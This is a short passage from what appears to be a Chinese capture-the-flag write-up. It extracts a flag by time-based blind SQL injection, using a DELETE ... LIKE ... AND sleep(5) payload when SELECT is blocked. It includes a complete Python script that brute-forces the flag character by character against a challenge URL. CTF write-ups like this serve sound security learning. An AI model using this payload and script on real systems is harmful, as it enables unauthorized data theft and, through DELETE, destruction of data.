#output Field TypeNull Key Default Extra id varchar(300) YES NULL data varchar(300) YES NULL
可以看到id和data两个字段,猜测flag在字段data中
然后使用时间盲注,这里select不能用了,但是可以使用delete命令来进行时间盲注
使用语句:
1
deletefrom flag where data like'f%'and sleep(5)
完整脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
import requests import string
sqlstr = string.ascii_lowercase + string.digits + '-' + "{}" url = "http://gz.imxbt.cn:20099/?sql=delete%20from%20flag%20where%20data%20like%20%27" end="%25%27%20and%20sleep(5)" flag='' for i in range(1, 100): for c in sqlstr: payload = url +flag+ c + end try: r = requests.get(payload,timeout=4) except: print(flag+c) flag+=c break